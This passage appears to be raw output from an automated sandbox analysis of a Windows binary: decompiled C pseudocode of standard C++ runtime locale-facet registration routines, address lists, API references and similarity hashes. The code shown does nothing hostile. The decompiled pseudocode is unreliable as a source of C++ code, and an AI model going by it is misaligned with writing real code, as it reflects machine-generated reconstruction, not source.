                                                                                                																								__eflags = E00F91B58(_t309, _t318, __eflags) - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(8);
                                                                                                																									E00FB38B2(0xfb6ebe, _t309, _t318);
                                                                                                																									E00F856E6(_t329 - 0x14, 0);
                                                                                                																									_t319 =  *0xfd0b60; // 0x0
                                                                                                																									 *(_t329 - 4) =  *(_t329 - 4) & 0x00000000;
                                                                                                																									 *(_t329 - 0x10) = _t319;
                                                                                                																									_t310 = E00F78A40( *((intOrPtr*)(_t329 + 8)), E00F789D0());
                                                                                                																									__eflags = _t310;
                                                                                                																									if(_t310 != 0) {
                                                                                                																										L54:
                                                                                                																										E00F8573E(_t329 - 0x14);
                                                                                                																										return E00FB388C(_t310);
                                                                                                																									} else {
                                                                                                																										__eflags = _t319;
                                                                                                																										if(__eflags == 0) {
                                                                                                																											_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                																											_push(_t329 - 0x10);
                                                                                                																											_t189 = E00F91BC4(_t310, _t319, __eflags);
                                                                                                																											_pop(_t276);
                                                                                                																											__eflags = _t189 - 0xffffffff;
                                                                                                																											if(__eflags == 0) {
                                                                                                																												E00F78FE0(__eflags);
                                                                                                																												asm("int3");
                                                                                                																												_push(4);
                                                                                                																												E00FB38B2(0xfb7295, _t310, _t319);
                                                                                                																												_t320 = _t276;
                                                                                                																												 *(_t329 - 0x10) = _t320;
                                                                                                																												 *((intOrPtr*)(_t320 + 4)) =  *((intOrPtr*)(_t329 + 0xc));
                                                                                                																												_push( *((intOrPtr*)(_t329 + 8)));
                                                                                                																												_t101 = _t329 - 4;
                                                                                                																												 *_t101 =  *(_t329 - 4) & 0x00000000;
                                                                                                																												__eflags =  *_t101;
                                                                                                																												 *_t320 = 0xfb9ac0;
                                                                                                																												E00F929F5(_t276, _t310, _t320,  *_t101);
                                                                                                																												return E00FB388C(_t320);
                                                                                                																											} else {
                                                                                                																												_t310 =  *(_t329 - 0x10);
                                                                                                																												 *(_t329 - 0x10) = _t310;
                                                                                                																												 *(_t329 - 4) = 1;
                                                                                                																												E00F85472(_t310);
                                                                                                																												 *0xfb81fc();
                                                                                                																												 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
                                                                                                																												 *0xfd0b60 = _t310;
                                                                                                																												goto L54;
                                                                                                																											}
                                                                                                																										} else {
                                                                                                																											_t310 = _t319;
                                                                                                																											goto L54;
                                                                                                																										}
                                                                                                																									}
                                                                                                																								} else {
                                                                                                																									_t309 =  *(_t329 - 0x10);
                                                                                                																									 *(_t329 - 0x10) = _t309;
                                                                                                																									 *(_t329 - 4) = 1;
                                                                                                																									E00F85472(_t309);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
                                                                                                																									 *0xfd0b5c = _t309;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t309 = _t318;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t308 =  *(_t329 - 0x10);
                                                                                                																						 *(_t329 - 0x10) = _t308;
                                                                                                																						 *(_t329 - 4) = 1;
                                                                                                																						E00F85472(_t308);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
                                                                                                																						 *0xfd0b54 = _t308;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t308 = _t317;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t307 =  *(_t329 - 0x10);
                                                                                                																			 *(_t329 - 0x10) = _t307;
                                                                                                																			 *(_t329 - 4) = 1;
                                                                                                																			E00F85472(_t307);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
                                                                                                																			 *0xfd0b58 = _t307;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t307 = _t316;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t306 =  *(_t329 - 0x10);
                                                                                                																 *(_t329 - 0x10) = _t306;
                                                                                                																 *(_t329 - 4) = 1;
                                                                                                																E00F85472(_t306);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t306 + 4))))();
                                                                                                																 *0xfd0b50 = _t306;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t306 = _t315;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t305 =  *(_t329 - 0x10);
                                                                                                													 *(_t329 - 0x10) = _t305;
                                                                                                													 *(_t329 - 4) = 1;
                                                                                                													E00F85472(_t305);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t305 + 4))))();
                                                                                                													 *0xfd0b4c = _t305;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t305 = _t314;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t304 =  *(_t329 - 0x10);
                                                                                                										 *(_t329 - 0x10) = _t304;
                                                                                                										 *(_t329 - 4) = 1;
                                                                                                										E00F85472(_t304);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t304 + 4))))();
                                                                                                										 *0xfd0b48 = _t304;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t304 = _t313;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t303 =  *(_t329 - 0x10);
                                                                                                							 *(_t329 - 0x10) = _t303;
                                                                                                							 *(_t329 - 4) = 1;
                                                                                                							E00F85472(_t303);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t303 + 4))))();
                                                                                                							 *0xfd0b44 = _t303;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t303 = _t312;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}
























                                                                                                0x00f912c6
                                                                                                0x00f912c6
                                                                                                0x00f912cd
                                                                                                0x00f912d7
                                                                                                0x00f912dc
                                                                                                0x00f912e7
                                                                                                0x00f912eb
                                                                                                0x00f912f7
                                                                                                0x00f912fc
                                                                                                0x00f91300
                                                                                                0x00f91345
                                                                                                0x00f91348
                                                                                                0x00f91354
                                                                                                0x00f91302
                                                                                                0x00f91304
                                                                                                0x00f9130a
                                                                                                0x00f91310
                                                                                                0x00f91318
                                                                                                0x00f9131b
                                                                                                0x00f91355
                                                                                                0x00f9135a
                                                                                                0x00f9135b
                                                                                                0x00f91362
                                                                                                0x00f9136c
                                                                                                0x00f91371
                                                                                                0x00f9137c
                                                                                                0x00f91380
                                                                                                0x00f91391
                                                                                                0x00f91393
                                                                                                0x00f91395
                                                                                                0x00f913da
                                                                                                0x00f913dd
                                                                                                0x00f913e9
                                                                                                0x00f91397
                                                                                                0x00f91397
                                                                                                0x00f91399
                                                                                                0x00f9139f
                                                                                                0x00f913a5
                                                                                                0x00f913ad
                                                                                                0x00f913b0
                                                                                                0x00f913ea
                                                                                                0x00f913ef
                                                                                                0x00f913f0
                                                                                                0x00f913f7
                                                                                                0x00f91401
                                                                                                0x00f91406
                                                                                                0x00f91411
                                                                                                0x00f91415
                                                                                                0x00f91426
                                                                                                0x00f91428
                                                                                                0x00f9142a
                                                                                                0x00f9146f
                                                                                                0x00f91472
                                                                                                0x00f9147e
                                                                                                0x00f9142c
                                                                                                0x00f9142c
                                                                                                0x00f9142e
                                                                                                0x00f91434
                                                                                                0x00f9143a
                                                                                                0x00f91442
                                                                                                0x00f91445
                                                                                                0x00f9147f
                                                                                                0x00f91484
                                                                                                0x00f91485
                                                                                                0x00f9148c
                                                                                                0x00f91496
                                                                                                0x00f9149b
                                                                                                0x00f914a6
                                                                                                0x00f914aa
                                                                                                0x00f914bb
                                                                                                0x00f914bd
                                                                                                0x00f914bf
                                                                                                0x00f91504
                                                                                                0x00f91507
                                                                                                0x00f91513
                                                                                                0x00f914c1
                                                                                                0x00f914c1
                                                                                                0x00f914c3
                                                                                                0x00f914c9
                                                                                                0x00f914cf
                                                                                                0x00f914d7
                                                                                                0x00f914da
                                                                                                0x00f91514
                                                                                                0x00f91519
                                                                                                0x00f9151a
                                                                                                0x00f91521
                                                                                                0x00f9152b
                                                                                                0x00f91530
                                                                                                0x00f9153b
                                                                                                0x00f9153f
                                                                                                0x00f91550
                                                                                                0x00f91552
                                                                                                0x00f91554
                                                                                                0x00f91599
                                                                                                0x00f9159c
                                                                                                0x00f915a8
                                                                                                0x00f91556
                                                                                                0x00f91556
                                                                                                0x00f91558
                                                                                                0x00f9155e
                                                                                                0x00f91564
                                                                                                0x00f9156c
                                                                                                0x00f9156f
                                                                                                0x00f915a9
                                                                                                0x00f915ae
                                                                                                0x00f915af
                                                                                                0x00f915b6
                                                                                                0x00f915c0
                                                                                                0x00f915c5
                                                                                                0x00f915d0
                                                                                                0x00f915d4
                                                                                                0x00f915e5
                                                                                                0x00f915e7
                                                                                                0x00f915e9
                                                                                                0x00f9162e
                                                                                                0x00f91631
                                                                                                0x00f9163d
                                                                                                0x00f915eb
                                                                                                0x00f915eb
                                                                                                0x00f915ed
                                                                                                0x00f915f3
                                                                                                0x00f915f9
                                                                                                0x00f91601
                                                                                                0x00f91604
                                                                                                0x00f9163e
                                                                                                0x00f91643
                                                                                                0x00f91644
                                                                                                0x00f9164b
                                                                                                0x00f91655
                                                                                                0x00f9165a
                                                                                                0x00f91665
                                                                                                0x00f91669
                                                                                                0x00f9167a
                                                                                                0x00f9167c
                                                                                                0x00f9167e
                                                                                                0x00f916c3
                                                                                                0x00f916c6
                                                                                                0x00f916d2
                                                                                                0x00f91680
                                                                                                0x00f91680
                                                                                                0x00f91682
                                                                                                0x00f91688
                                                                                                0x00f9168e
                                                                                                0x00f91696
                                                                                                0x00f91699
                                                                                                0x00f916d3
                                                                                                0x00f916d8
                                                                                                0x00f916d9
                                                                                                0x00f916e0
                                                                                                0x00f916ea
                                                                                                0x00f916ef
                                                                                                0x00f916fa
                                                                                                0x00f916fe
                                                                                                0x00f9170f
                                                                                                0x00f91711
                                                                                                0x00f91713
                                                                                                0x00f91758
                                                                                                0x00f9175b
                                                                                                0x00f91767
                                                                                                0x00f91715
                                                                                                0x00f91715
                                                                                                0x00f91717
                                                                                                0x00f9171d
                                                                                                0x00f91723
                                                                                                0x00f91724
                                                                                                0x00f9172a
                                                                                                0x00f9172b
                                                                                                0x00f9172e
                                                                                                0x00f91768
                                                                                                0x00f9176d
                                                                                                0x00f9176e
                                                                                                0x00f91775
                                                                                                0x00f9177a
                                                                                                0x00f9177c
                                                                                                0x00f91782
                                                                                                0x00f91785
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f91788
                                                                                                0x00f9178c
                                                                                                0x00f91792
                                                                                                0x00f9179e
                                                                                                0x00f91730
                                                                                                0x00f91730
                                                                                                0x00f91733
                                                                                                0x00f91737
                                                                                                0x00f9173b
                                                                                                0x00f91748
                                                                                                0x00f91750
                                                                                                0x00f91752
                                                                                                0x00000000
                                                                                                0x00f91752
                                                                                                0x00f91719
                                                                                                0x00f91719
                                                                                                0x00000000
                                                                                                0x00f91719
                                                                                                0x00f91717
                                                                                                0x00f9169b
                                                                                                0x00f9169b
                                                                                                0x00f9169e
                                                                                                0x00f916a2
                                                                                                0x00f916a6
                                                                                                0x00f916b3
                                                                                                0x00f916bb
                                                                                                0x00f916bd
                                                                                                0x00000000
                                                                                                0x00f916bd
                                                                                                0x00f91684
                                                                                                0x00f91684
                                                                                                0x00000000
                                                                                                0x00f91684
                                                                                                0x00f91682
                                                                                                0x00f91606
                                                                                                0x00f91606
                                                                                                0x00f91609
                                                                                                0x00f9160d
                                                                                                0x00f91611
                                                                                                0x00f9161e
                                                                                                0x00f91626
                                                                                                0x00f91628
                                                                                                0x00000000
                                                                                                0x00f91628
                                                                                                0x00f915ef
                                                                                                0x00f915ef
                                                                                                0x00000000
                                                                                                0x00f915ef
                                                                                                0x00f915ed
                                                                                                0x00f91571
                                                                                                0x00f91571
                                                                                                0x00f91574
                                                                                                0x00f91578
                                                                                                0x00f9157c
                                                                                                0x00f91589
                                                                                                0x00f91591
                                                                                                0x00f91593
                                                                                                0x00000000
                                                                                                0x00f91593
                                                                                                0x00f9155a
                                                                                                0x00f9155a
                                                                                                0x00000000
                                                                                                0x00f9155a
                                                                                                0x00f91558
                                                                                                0x00f914dc
                                                                                                0x00f914dc
                                                                                                0x00f914df
                                                                                                0x00f914e3
                                                                                                0x00f914e7
                                                                                                0x00f914f4
                                                                                                0x00f914fc
                                                                                                0x00f914fe
                                                                                                0x00000000
                                                                                                0x00f914fe
                                                                                                0x00f914c5
                                                                                                0x00f914c5
                                                                                                0x00000000
                                                                                                0x00f914c5
                                                                                                0x00f914c3
                                                                                                0x00f91447
                                                                                                0x00f91447
                                                                                                0x00f9144a
                                                                                                0x00f9144e
                                                                                                0x00f91452
                                                                                                0x00f9145f
                                                                                                0x00f91467
                                                                                                0x00f91469
                                                                                                0x00000000
                                                                                                0x00f91469
                                                                                                0x00f91430
                                                                                                0x00f91430
                                                                                                0x00000000
                                                                                                0x00f91430
                                                                                                0x00f9142e
                                                                                                0x00f913b2
                                                                                                0x00f913b2
                                                                                                0x00f913b5
                                                                                                0x00f913b9
                                                                                                0x00f913bd
                                                                                                0x00f913ca
                                                                                                0x00f913d2
                                                                                                0x00f913d4
                                                                                                0x00000000
                                                                                                0x00f913d4
                                                                                                0x00f9139b
                                                                                                0x00f9139b
                                                                                                0x00000000
                                                                                                0x00f9139b
                                                                                                0x00f91399
                                                                                                0x00f9131d
                                                                                                0x00f9131d
                                                                                                0x00f91320
                                                                                                0x00f91324
                                                                                                0x00f91328
                                                                                                0x00f91335
                                                                                                0x00f9133d
                                                                                                0x00f9133f
                                                                                                0x00000000
                                                                                                0x00f9133f
                                                                                                0x00f91306
                                                                                                0x00f91306
                                                                                                0x00000000
                                                                                                0x00f91306
                                                                                                0x00f91304

                                                                                                APIs
                                                                                                • __EH_prolog3.LIBCMT ref: 00F912CD
                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 00F912D7
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::_Lockit.LIBCPMT ref: 00F78A00
                                                                                                  • Part of subcall function 00F789D0: std::_Lockit::~_Lockit.LIBCPMT ref: 00F78A28
                                                                                                • collate.LIBCPMT ref: 00F91311
                                                                                                • std::_Facet_Register.LIBCPMT ref: 00F91328
                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 00F91348
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000E.00000002.327941628.0000000000F71000.00000020.00020000.sdmp, Offset: 00F70000, based on PE: true
                                                                                                • Associated: 0000000E.00000002.327936467.0000000000F70000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.327980112.0000000000FB8000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328006358.0000000000FCF000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 0000000E.00000002.328015005.0000000000FD3000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                                                • String ID:
                                                                                                • API String ID: 1007100420-0
                                                                                                • Opcode ID: fa771517af42eb86fe92359ab802568206bae2711ea75c4722edbfcf11ae6775
                                                                                                • Instruction ID: 49a6e2636e9649a6f3069da54333aa05a8f29b960f5b096f79d8d081bdeaf82a
                                                                                                • Opcode Fuzzy Hash: fa771517af42eb86fe92359ab802568206bae2711ea75c4722edbfcf11ae6775
                                                                                                • Instruction Fuzzy Hash: 2C01C43590011A9BDF04EB64CC05AEDB7B5BF84760F14401AE815A72D1DF38DE02BB82
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 71%
                                                                                                			E00F9135B(void* __edi, void* __esi, void* __eflags) {
                                                                                                				signed int _t95;
                                                                                                				void* _t166;
                                                                                                				signed int _t243;
                                                                                                				signed int _t267;
                                                                                                				signed int _t268;
                                                                                                				signed int _t269;
                                                                                                				signed int _t270;
                                                                                                				signed int _t271;
                                                                                                				signed int _t272;
                                                                                                				signed int _t274;
                                                                                                				signed int _t275;
                                                                                                				signed int _t276;
                                                                                                				signed int _t277;
                                                                                                				signed int _t278;
                                                                                                				signed int _t279;
                                                                                                				signed int _t280;
                                                                                                				signed int _t281;
                                                                                                				void* _t289;
                                                                                                
                                                                                                				_push(8);
                                                                                                				E00FB38B2(0xfb6ebe, __edi, __esi);
                                                                                                				E00F856E6(_t289 - 0x14, 0);
                                                                                                				_t274 =  *0xfd0b48; // 0x0
                                                                                                				 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                				 *(_t289 - 0x10) = _t274;
                                                                                                				_t95 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                				_t266 = _t95;
                                                                                                				if(_t95 != 0) {
                                                                                                					L5:
                                                                                                					E00F8573E(_t289 - 0x14);
                                                                                                					return E00FB388C(_t266);
                                                                                                				} else {
                                                                                                					if(_t274 == 0) {
                                                                                                						_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                						_push(_t289 - 0x10);
                                                                                                						__eflags = E00F91917(_t266, _t274, __eflags) - 0xffffffff;
                                                                                                						if(__eflags == 0) {
                                                                                                							E00F78FE0(__eflags);
                                                                                                							asm("int3");
                                                                                                							_push(8);
                                                                                                							E00FB38B2(0xfb6ebe, _t266, _t274);
                                                                                                							E00F856E6(_t289 - 0x14, 0);
                                                                                                							_t275 =  *0xfd0b4c; // 0x0
                                                                                                							 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                							 *(_t289 - 0x10) = _t275;
                                                                                                							_t267 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                							__eflags = _t267;
                                                                                                							if(_t267 != 0) {
                                                                                                								L12:
                                                                                                								E00F8573E(_t289 - 0x14);
                                                                                                								return E00FB388C(_t267);
                                                                                                							} else {
                                                                                                								__eflags = _t275;
                                                                                                								if(__eflags == 0) {
                                                                                                									_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                									_push(_t289 - 0x10);
                                                                                                									__eflags = E00F9197F(_t267, _t275, __eflags) - 0xffffffff;
                                                                                                									if(__eflags == 0) {
                                                                                                										E00F78FE0(__eflags);
                                                                                                										asm("int3");
                                                                                                										_push(8);
                                                                                                										E00FB38B2(0xfb6ebe, _t267, _t275);
                                                                                                										E00F856E6(_t289 - 0x14, 0);
                                                                                                										_t276 =  *0xfd0b50; // 0x0
                                                                                                										 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                										 *(_t289 - 0x10) = _t276;
                                                                                                										_t268 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                										__eflags = _t268;
                                                                                                										if(_t268 != 0) {
                                                                                                											L19:
                                                                                                											E00F8573E(_t289 - 0x14);
                                                                                                											return E00FB388C(_t268);
                                                                                                										} else {
                                                                                                											__eflags = _t276;
                                                                                                											if(__eflags == 0) {
                                                                                                												_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                												_push(_t289 - 0x10);
                                                                                                												__eflags = E00F919E7(_t268, _t276, __eflags) - 0xffffffff;
                                                                                                												if(__eflags == 0) {
                                                                                                													E00F78FE0(__eflags);
                                                                                                													asm("int3");
                                                                                                													_push(8);
                                                                                                													E00FB38B2(0xfb6ebe, _t268, _t276);
                                                                                                													E00F856E6(_t289 - 0x14, 0);
                                                                                                													_t277 =  *0xfd0b58; // 0x0
                                                                                                													 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                													 *(_t289 - 0x10) = _t277;
                                                                                                													_t269 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                													__eflags = _t269;
                                                                                                													if(_t269 != 0) {
                                                                                                														L26:
                                                                                                														E00F8573E(_t289 - 0x14);
                                                                                                														return E00FB388C(_t269);
                                                                                                													} else {
                                                                                                														__eflags = _t277;
                                                                                                														if(__eflags == 0) {
                                                                                                															_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                															_push(_t289 - 0x10);
                                                                                                															__eflags = E00F91A4F(_t269, _t277, __eflags) - 0xffffffff;
                                                                                                															if(__eflags == 0) {
                                                                                                																E00F78FE0(__eflags);
                                                                                                																asm("int3");
                                                                                                																_push(8);
                                                                                                																E00FB38B2(0xfb6ebe, _t269, _t277);
                                                                                                																E00F856E6(_t289 - 0x14, 0);
                                                                                                																_t278 =  *0xfd0b54; // 0x0
                                                                                                																 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                																 *(_t289 - 0x10) = _t278;
                                                                                                																_t270 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                																__eflags = _t270;
                                                                                                																if(_t270 != 0) {
                                                                                                																	L33:
                                                                                                																	E00F8573E(_t289 - 0x14);
                                                                                                																	return E00FB388C(_t270);
                                                                                                																} else {
                                                                                                																	__eflags = _t278;
                                                                                                																	if(__eflags == 0) {
                                                                                                																		_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                																		_push(_t289 - 0x10);
                                                                                                																		__eflags = E00F91AD3(_t270, _t278, __eflags) - 0xffffffff;
                                                                                                																		if(__eflags == 0) {
                                                                                                																			E00F78FE0(__eflags);
                                                                                                																			asm("int3");
                                                                                                																			_push(8);
                                                                                                																			E00FB38B2(0xfb6ebe, _t270, _t278);
                                                                                                																			E00F856E6(_t289 - 0x14, 0);
                                                                                                																			_t279 =  *0xfd0b5c; // 0x0
                                                                                                																			 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                																			 *(_t289 - 0x10) = _t279;
                                                                                                																			_t271 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                																			__eflags = _t271;
                                                                                                																			if(_t271 != 0) {
                                                                                                																				L40:
                                                                                                																				E00F8573E(_t289 - 0x14);
                                                                                                																				return E00FB388C(_t271);
                                                                                                																			} else {
                                                                                                																				__eflags = _t279;
                                                                                                																				if(__eflags == 0) {
                                                                                                																					_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                																					_push(_t289 - 0x10);
                                                                                                																					__eflags = E00F91B58(_t271, _t279, __eflags) - 0xffffffff;
                                                                                                																					if(__eflags == 0) {
                                                                                                																						E00F78FE0(__eflags);
                                                                                                																						asm("int3");
                                                                                                																						_push(8);
                                                                                                																						E00FB38B2(0xfb6ebe, _t271, _t279);
                                                                                                																						E00F856E6(_t289 - 0x14, 0);
                                                                                                																						_t280 =  *0xfd0b60; // 0x0
                                                                                                																						 *(_t289 - 4) =  *(_t289 - 4) & 0x00000000;
                                                                                                																						 *(_t289 - 0x10) = _t280;
                                                                                                																						_t272 = E00F78A40( *((intOrPtr*)(_t289 + 8)), E00F789D0());
                                                                                                																						__eflags = _t272;
                                                                                                																						if(_t272 != 0) {
                                                                                                																							L47:
                                                                                                																							E00F8573E(_t289 - 0x14);
                                                                                                																							return E00FB388C(_t272);
                                                                                                																						} else {
                                                                                                																							__eflags = _t280;
                                                                                                																							if(__eflags == 0) {
                                                                                                																								_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                																								_push(_t289 - 0x10);
                                                                                                																								_t166 = E00F91BC4(_t272, _t280, __eflags);
                                                                                                																								_pop(_t243);
                                                                                                																								__eflags = _t166 - 0xffffffff;
                                                                                                																								if(__eflags == 0) {
                                                                                                																									E00F78FE0(__eflags);
                                                                                                																									asm("int3");
                                                                                                																									_push(4);
                                                                                                																									E00FB38B2(0xfb7295, _t272, _t280);
                                                                                                																									_t281 = _t243;
                                                                                                																									 *(_t289 - 0x10) = _t281;
                                                                                                																									 *((intOrPtr*)(_t281 + 4)) =  *((intOrPtr*)(_t289 + 0xc));
                                                                                                																									_push( *((intOrPtr*)(_t289 + 8)));
                                                                                                																									_t89 = _t289 - 4;
                                                                                                																									 *_t89 =  *(_t289 - 4) & 0x00000000;
                                                                                                																									__eflags =  *_t89;
                                                                                                																									 *_t281 = 0xfb9ac0;
                                                                                                																									E00F929F5(_t243, _t272, _t281,  *_t89);
                                                                                                																									return E00FB388C(_t281);
                                                                                                																								} else {
                                                                                                																									_t272 =  *(_t289 - 0x10);
                                                                                                																									 *(_t289 - 0x10) = _t272;
                                                                                                																									 *(_t289 - 4) = 1;
                                                                                                																									E00F85472(_t272);
                                                                                                																									 *0xfb81fc();
                                                                                                																									 *((intOrPtr*)( *((intOrPtr*)( *_t272 + 4))))();
                                                                                                																									 *0xfd0b60 = _t272;
                                                                                                																									goto L47;
                                                                                                																								}
                                                                                                																							} else {
                                                                                                																								_t272 = _t280;
                                                                                                																								goto L47;
                                                                                                																							}
                                                                                                																						}
                                                                                                																					} else {
                                                                                                																						_t271 =  *(_t289 - 0x10);
                                                                                                																						 *(_t289 - 0x10) = _t271;
                                                                                                																						 *(_t289 - 4) = 1;
                                                                                                																						E00F85472(_t271);
                                                                                                																						 *0xfb81fc();
                                                                                                																						 *((intOrPtr*)( *((intOrPtr*)( *_t271 + 4))))();
                                                                                                																						 *0xfd0b5c = _t271;
                                                                                                																						goto L40;
                                                                                                																					}
                                                                                                																				} else {
                                                                                                																					_t271 = _t279;
                                                                                                																					goto L40;
                                                                                                																				}
                                                                                                																			}
                                                                                                																		} else {
                                                                                                																			_t270 =  *(_t289 - 0x10);
                                                                                                																			 *(_t289 - 0x10) = _t270;
                                                                                                																			 *(_t289 - 4) = 1;
                                                                                                																			E00F85472(_t270);
                                                                                                																			 *0xfb81fc();
                                                                                                																			 *((intOrPtr*)( *((intOrPtr*)( *_t270 + 4))))();
                                                                                                																			 *0xfd0b54 = _t270;
                                                                                                																			goto L33;
                                                                                                																		}
                                                                                                																	} else {
                                                                                                																		_t270 = _t278;
                                                                                                																		goto L33;
                                                                                                																	}
                                                                                                																}
                                                                                                															} else {
                                                                                                																_t269 =  *(_t289 - 0x10);
                                                                                                																 *(_t289 - 0x10) = _t269;
                                                                                                																 *(_t289 - 4) = 1;
                                                                                                																E00F85472(_t269);
                                                                                                																 *0xfb81fc();
                                                                                                																 *((intOrPtr*)( *((intOrPtr*)( *_t269 + 4))))();
                                                                                                																 *0xfd0b58 = _t269;
                                                                                                																goto L26;
                                                                                                															}
                                                                                                														} else {
                                                                                                															_t269 = _t277;
                                                                                                															goto L26;
                                                                                                														}
                                                                                                													}
                                                                                                												} else {
                                                                                                													_t268 =  *(_t289 - 0x10);
                                                                                                													 *(_t289 - 0x10) = _t268;
                                                                                                													 *(_t289 - 4) = 1;
                                                                                                													E00F85472(_t268);
                                                                                                													 *0xfb81fc();
                                                                                                													 *((intOrPtr*)( *((intOrPtr*)( *_t268 + 4))))();
                                                                                                													 *0xfd0b50 = _t268;
                                                                                                													goto L19;
                                                                                                												}
                                                                                                											} else {
                                                                                                												_t268 = _t276;
                                                                                                												goto L19;
                                                                                                											}
                                                                                                										}
                                                                                                									} else {
                                                                                                										_t267 =  *(_t289 - 0x10);
                                                                                                										 *(_t289 - 0x10) = _t267;
                                                                                                										 *(_t289 - 4) = 1;
                                                                                                										E00F85472(_t267);
                                                                                                										 *0xfb81fc();
                                                                                                										 *((intOrPtr*)( *((intOrPtr*)( *_t267 + 4))))();
                                                                                                										 *0xfd0b4c = _t267;
                                                                                                										goto L12;
                                                                                                									}
                                                                                                								} else {
                                                                                                									_t267 = _t275;
                                                                                                									goto L12;
                                                                                                								}
                                                                                                							}
                                                                                                						} else {
                                                                                                							_t266 =  *(_t289 - 0x10);
                                                                                                							 *(_t289 - 0x10) = _t266;
                                                                                                							 *(_t289 - 4) = 1;
                                                                                                							E00F85472(_t266);
                                                                                                							 *0xfb81fc();
                                                                                                							 *((intOrPtr*)( *((intOrPtr*)( *_t266 + 4))))();
                                                                                                							 *0xfd0b48 = _t266;
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						_t266 = _t274;
                                                                                                						goto L5;
                                                                                                					}
                                                                                                				}
                                                                                                			}





















                                                                                                0x00f9135b
                                                                                                0x00f91362
                                                                                                0x00f9136c
                                                                                                0x00f91371
                                                                                                0x00f9137c
                                                                                                0x00f91380
                                                                                                0x00f9138c
                                                                                                0x00f91391
                                                                                                0x00f91395
                                                                                                0x00f913da
                                                                                                0x00f913dd
                                                                                                0x00f913e9
                                                                                                0x00f91397
                                                                                                0x00f91399
                                                                                                0x00f9139f
                                                                                                0x00f913a5
                                                                                                0x00f913ad
                                                                                                0x00f913b0
                                                                                                0x00f913ea
                                                                                                0x00f913ef
                                                                                                0x00f913f0
                                                                                                0x00f913f7
                                                                                                0x00f91401
                                                                                                0x00f91406
                                                                                                0x00f91411
                                                                                                0x00f91415
                                                                                                0x00f91426
                                                                                                0x00f91428
                                                                                                0x00f9142a
                                                                                                0x00f9146f
                                                                                                0x00f91472
                                                                                                0x00f9147e
                                                                                                0x00f9142c
                                                                                                0x00f9142c
                                                                                                0x00f9142e
                                                                                                0x00f91434
                                                                                                0x00f9143a
                                                                                                0x00f91442
                                                                                                0x00f91445
                                                                                                0x00f9147f
                                                                                                0x00f91484
                                                                                                0x00f91485
                                                                                                0x00f9148c
                                                                                                0x00f91496
                                                                                                0x00f9149b
                                                                                                0x00f914a6
